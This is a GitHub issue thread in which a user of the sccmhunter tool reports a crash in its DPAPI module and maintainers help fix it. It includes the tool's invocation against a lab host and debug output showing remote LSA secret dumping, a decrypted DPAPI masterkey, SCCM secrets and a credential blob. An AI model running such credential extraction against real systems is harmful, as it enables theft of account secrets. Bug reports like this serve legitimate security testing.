search

garrettfoster13 / sccmhunter

MIT License
649 stars 79 forks source link

Issue with the DPAPI #31

Closed Cyb3rGh0st786 closed 11 months ago

Cyb3rGh0st786 commented 11 months ago

Hello @garrettfoster13, @RalphDesmangles

I have tried to use the DPAPI module and I am getting the following error. 

python3 sccmhunter.py dpapi -u Test -d test.com -target 172.16.x.x -p Testpassword

                                                                                          (
                                    888                         d8                         \
 dP"Y  e88'888  e88'888 888 888 8e  888 ee  8888 8888 888 8e   d88    ,e e,  888,8,        )
C88b  d888  '8 d888  '8 888 888 88b 888 88b 8888 8888 888 88b d88888 d88 88b 888 "    ##-------->
 Y88D Y888   , Y888   , 888 888 888 888 888 Y888 888P 888 888  888   888   , 888           )
d,dP   "88,e8'  "88,e8' 888 888 888 888 888  "88 88"  888 888  888    "YeeP" 888          /
                                                                                         (
                                                                 v0.0.2                   
                                                                 @garrfoster                    

[12:02:53] INFO     [*] Querying SCCM configuration via WMI                                                                                                                                                                                 
[12:02:53] INFO     [+] Got 2 SCCM secrets.                                                                                                                                                                                                 
[12:02:53] INFO     [+] Credential file found: DFBE70A7E5CC19A398EBF1B96859CE5D                                                                                                                                                             
[12:02:53] INFO     [+] Retrieving credential file: DFBE70A7E5CC19A398EBF1B96859CE5D                                                                                                                                                        
[12:02:53] INFO     [+] Retrieving masterkey file: C829C67B-4573-4D92-9ECD-AC9609F3E6C1                                                                                                                                                     
[12:02:54] INFO     [!] LSA hashes extraction failed: 'HashRecords'                                                                                                                                                                         
Exception ignored in: <function Registry.__del__ at 0x7f6d22ea7920>
Traceback (most recent call last):
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/winregistry.py", line 182, in __del__
    self.close()
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/winregistry.py", line 179, in close
    self.fd.close()
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/examples/secretsdump.py", line 356, in close
    self.__smbConnection.closeFile(self.__tid, self.__fid)
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smbconnection.py", line 603, in closeFile
    return self._SMBConnection.close(treeId, fileId)
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smb3.py", line 1271, in close
    packetID = self.sendSMB(packet)
               ^^^^^^^^^^^^^^^^^^^^
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/smb3.py", line 423, in sendSMB
    self._NetBIOSSession.send_packet(packet)
  File "/home/kali/Desktop/tools/sccmhunter/sccmhunter/lib/python3.11/site-packages/impacket/nmb.py", line 912, in send_packet
    self._sock.sendall(p.rawData())
OSError: [Errno 9] Bad file descriptor

I have used the systemdpapidump.py module, and it works fine.

RalphDesmangles commented 11 months ago

@kaleemshaik7867 What OS is the SCCM client running? Do you mind sharing SystemDPAPI.py -debug output?

Also added additional logging on my fork, you can just pass -debug. https://github.com/RalphDesmangles/sccmhunter/tree/main

Cyb3rGh0st786 commented 11 months ago

Hello @RalphDesmangles ,

The client is running on the below. 

Edition Windows 11 Pro
Version 22H2
Installed on    ‎06/‎10/‎2023
OS build    22621.2715
Experience  Windows Feature Experience Pack 1000.22677.1000.0

Here is the output of the dpapi script. Seems there is an issue while decrypting the master key. I have changed the username and secrets of the below output 

SystemDPAPIdump.py adlabone.com/Test@172.16.53.12 -debug
Impacket for Exegol - v0.10.1.dev1+20230909.241.3001b261 - Copyright 2022 Fortra - forked by ThePorgs

[+] Impacket Library Installation Path: /usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket
Password:
[*] Querying SCCM configuration via WMI
[+] Target system is 172.16.53.12 and isFQDN is False
[+] StringBinding: pc[51070]
[+] StringBinding: 172.16.53.12[51070]
[+] StringBinding chosen: ncacn_ip_tcp:172.16.53.12[51070]
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/EGG-INFO/scripts/SystemDPAPIdump.py", line 137, in dump
    pEnum = iEnum.Next(0xffffffff,1)[0]
            ^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/dcom/wmi.py", line 2947, in Next
    resp = self.request(request, iid = self._iid, uuid = self.get_iPid())
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/dcomrt.py", line 1329, in request
    resp = dce.request(req, uuid)
           ^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/dcerpc/v5/rpcrt.py", line 880, in request
    raise exception
impacket.dcerpc.v5.dcom.wmi.DCERPCSessionError: WMI Session Error: code: 0x1 - WBEM_S_FALSE
[*] Got 2 SCCM secrets.
[*] Credential file found: DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Retrieving credential file: DFBE70A7E5CC19A398EBF1B96859CE5D
[*] Retrieving masterkey file: C829C67B-4573-4D92-9ECD-AC9609F3E6C1
[+] Service RemoteRegistry is already running
[+] Retrieving class info for JD
[+] Retrieving class info for Skew1
[+] Retrieving class info for GBG
[+] Retrieving class info for Data
[*] Target system bootKey: 0x545aa854f327d07deca3ec602c5c74d5
[+] Saving remote SECURITY database
[*] Dumping LSA Secrets
[+] Decrypting LSA Key
[+] Looking into $MACHINE.ACC
[*] $MACHINE.ACC 
[+] Looking into DefaultPassword
[+] Discarding secret DefaultPassword, NULL Data
[+] Looking into DPAPI_SYSTEM
[*] DPAPI_SYSTEM 
[+] Looking into DSREGCMD
[+] Unknown type 0xb''
Traceback (most recent call last):
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/EGG-INFO/scripts/SystemDPAPIdump.py", line 258, in dump
    self.__LSASecrets.dumpSecrets()
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/examples/secretsdump.py", line 1799, in dumpSecrets
    value = self.getValue('\\Policy\\Secrets\\{}\\{}\\default'.format(key,valueType))
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/examples/secretsdump.py", line 1233, in getValue
    value = self.__registryHive.getValue(keyValue)
            ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 458, in getValue
    key = self.findKey(regKey)
          ^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 378, in findKey
    res = self.__findSubKey(parentKey, subKey)
          ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/winregistry.py", line 299, in __findSubKey
    data = lf['HashRecords']
           ~~^^^^^^^^^^^^^^^
  File "/usr/local/lib/python3.11/dist-packages/impacket-0.10.1.dev1+20230909.241.3001b261-py3.11.egg/impacket/structure.py", line 169, in __getitem__
    return self.fields[key]
           ~~~~~~~~~~~^^^^^
KeyError: 'HashRecords'
[-] LSA hashes extraction failed: 'HashRecords'
[*] Cleaning up... 
[*] Decrypted masterkey C829C67B-4573-4D92-9ECD-AC9609F3E6C1: 0x43dae8247fd77b2377072fa03cb62925ced5b65659a7eebb4ad3b714a36afbc0a4f05eae597b2b188a0874a8e7c89765a4b147c5ff5737f499365ea60d8bc148
[*] Decrypting SCCM secret 0
TestPassword
[*] Decrypting SCCM secret 1
example\Testuser
[*] Decrypting credential DFBE70A7E5CC19A398EBF1B96859CE5D
[CREDENTIAL]
LastWritten : 2023-10-06 11:12:44
Flags       : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist     : 0x00000002 (CRED_PERSIST_LOCAL_MACHINE)
Type        : 0x00000001 (CRED_TYPE_GENERIC)
Target      : WindowsLive:target=virtualapp/didlogical
Description : PersistedCredential
Unknown     : 
Username    : 02akkplqndhhbeze
Unknown     : 

KeyWord : Microsoft_WindowsLive:authstate:0
Data    : 
 0000   01 00 00 00 D0 8C 9D DF  01 15 D1 11 8C 7A 00 C0   .............z..
 0010   4F C2 97 EB 01 00 00 00  7B C6 29 C8 73 45 92 4D   O.......{.).sE.M
 0020   9E CD AC 96 09 F3 E6 C1  00 00 00 00 02 00 00 00   ................
 0030   00 00 10 66 00 00 00 01  00 00 20 00 00 00 A2 83   ...f...... .....
 0040   75 0E AF F3 98 D3 88 D1  EB 7B 80 49 F2 BE EC E2   u........{.I....
 0050   DA D4 DB 5B EF E1 61 B5  7F 88 7F 96 2F 8D 00 00   ...[..a...../...
 0060   00 00 0E 80 00 00 00 02  00 00 20 00 00 00 75 FF   .......... ...u.
 0070   E0 07 4A EC 32 E6 A8 55  BE 4D 79 A0 A7 F2 11 C3   ..J.2..U.My.....
 0080   EC E5 1F BA F2 8E 1B 5B  FF 0A 68 6F 3F 23 90 1F   .......[..ho?#..
 0090   00 00 A5 73 21 B4 EE 4E  65 25 EF A9 D6 B2 2F FC   ...s!..Ne%..../.
 00a0   E3 0E B8 A8 8A 4D 67 73  C2 6A DE E9 E4 44 8A 6C   .....Mgs.j...D.l
 00b0   BA 57 B5 2F 77 5C 5B 7E  29 39 4E 54 06 45 01 EC   .W./w\[~)9NT.E..
 00c0   A4 30 EC 95 74 5E 3A 45  5D FE AE 3F 49 2F 2A 1E   .0..t^:E]..?I/*.
 00d0   28 80 81 4A B7 1E F5 B0  CA 66 36 23 BB A2 EB E5   (..J.....f6#....
 00e0   C1 AA 1B 88 6E A4 6E 7D  59 A8 9F B1 DC C9 38 2C   ....n.n}Y.....8,
 00f0   B4 74 A4 29 10 63 11 4E  FA 50 E4 8E 81 BF EE 6F   .t.).c.N.P.....o
KeyWord : Microsoft_WindowsLive:authstate:1
garrettfoster13 commented 11 months ago

@kaleemshaik7867

Could you pull the dev branch and test the changes to the dpapi module?

Cyb3rGh0st786 commented 11 months ago

Thank you @garrettfoster13 , it worked

image